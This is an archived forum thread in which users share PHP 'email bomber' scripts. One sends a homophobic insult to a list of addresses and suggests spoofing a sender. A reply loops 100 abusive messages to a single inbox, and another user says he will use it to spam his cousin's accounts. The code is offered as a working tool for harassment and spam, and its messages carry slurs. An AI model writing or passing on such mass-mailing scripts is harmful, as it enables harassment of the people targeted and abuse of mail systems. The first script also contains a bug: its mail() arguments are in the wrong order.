A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

[Php]Email Bomber!

1.9k views · started by Domo™ · · closed
#1
[Php]Email Bomber!
<?php
$email_list = file("Your Current Email List");

$total_emails = count($email_list);

for ($counter=0; $counter<$total_emails; $counter++) {
$email_list[$counter] = trim($email_list[$counter]);
}

$to = implode(",",$email_list);

$subject = "You fucking suck ;D"; //<-- Fill this in with the subject. E.g: "Domo's Email Bomber! Beta Test"
$message = "Your Fucking Gay ;D"; //<-- Put you're e-mail content here.
$from = ""; //Put who's it from. E.g "noreply@Gaiaonline.com"
if ( mail($to,$from, $subject,$message) ) {
echo "The email has been sent!";
} else {
echo "The email has failed!";
}
?>

Hey i wanted to share my email bomber to see if it works ;/ or not if it doesn't please post that it doesnt.
please contact if this also has wrong coding ;/
;D ~BETA TEST!~
#2
code is wrong, it attempts to send to the entire file contents of the emails file. Ill fix it up really fast.
#3
Sk8er wrote:
code is wrong, it attempts to send to the entire file contents of the emails file. Ill fix it up really fast.


Alright thanks ;D
and i just made this code today and it sucks ;[
#4
Probably the quickest way to get your site deleted on any public host. Doing it on your local host is probably the quickest way to get caught.
You probably can't use it to make a lot of money (via spam marketing), but you can surely use it to piss someone off. ;D

I threatened a friend of mine before with something like this. Jokingly, but this would have been the method used. I have a nice little key on my keyboard that I can set to do anything (a custom key designed for custom commands). I told him I'd set it to spam his inbox with gay porn. XD

Oh, this would be a spammer (the OP is more of a newsletter):
<?php
for ($x = 0; $x < 100; ++$x)
mail("yousuck@mailinator.com", "You suck!", "I hate you. Enjoy your gay porn. [image]");
?>[/image]


Or something like that.
#5
GAMEchief wrote:
Probably the quickest way to get your site deleted on any public host. Doing it on your local host is probably the quickest way to get caught.
You probably can't use it to make a lot of money (via spam marketing), but you can surely use it to piss someone off. ;D

I threatened a friend of mine before with something like this. Jokingly, but this would have been the method used. I have a nice little key on my keyboard that I can set to do anything (a custom key designed for custom commands). I told him I'd set it to spam his inbox with gay porn. XD

Oh, this would be a spammer (the OP is more of a newsletter):
<?php
for ($x = 0; $x < 100; ++$x)
mail("yousuck@mailinator.com", "You suck!", "I hate you. Enjoy your gay porn. [image]");
?>[/image]


Or something like that.


Thanks bro ;D
im using this to spam my cousins email accounts.
#7
>.> I figured that wasnt his. Just was too lazy to look for the script. Domo, stop taking credit of other peoples work or be banned >O
#8
I use to use that code in my own php email spammer for reasons. 1.) I was to lazy to make my own
#9
Chad wrote:
I use to use that code in my own php email spammer for reasons. 1.) I was to lazy to make my own


I do too, but he's claiming it in this case.

Hey i wanted to share my email bomber to see if it works ;/ or not if it doesn't please post that it doesnt.
please contact if this also has wrong coding ;/
#10
wtf no mine is diffrent than that one O.O
#11
The one Essence Posted.
<?php
// read the list of emails from the file.
$email_list = file("elist.txt");

// count how many emails there are.
$total_emails = count($email_list);

// go through the list and trim off the newline character.
for ($counter=0; $counter<$total_emails; $counter++) {
$email_list[$counter] = trim($email_list[$counter]);
}

// implode the list into a single variable, put commas in, apply as $to value.
$to = implode(",",$email_list);

$subject = "My email test.";
$message = "Hello, how are you?";

if ( mail($to,$subject,$message) ) {
echo "The email has been sent!";
} else {
echo "The email has failed!";
}
?>


The one i posted.

<?php
$email_list = file("Your Current Email List");

$total_emails = count($email_list);

for ($counter=0; $counter<$total_emails; $counter++) {
$email_list[$counter] = trim($email_list[$counter]);
}

$to = implode(",",$email_list);

$subject = "You fucking suck ;D"; //<-- Fill this in with the subject. E.g: "Domo's Email Bomber! Beta Test"
$message = "Your Fucking Gay ;D"; //<-- Put you're e-mail content here.
$from = ""; //Put who's it from. E.g "noreply@Gaiaonline.com"
if ( mail($to,$from, $subject,$message) ) {
echo "The email has been sent!";
} else {
echo "The email has failed!";
}
?>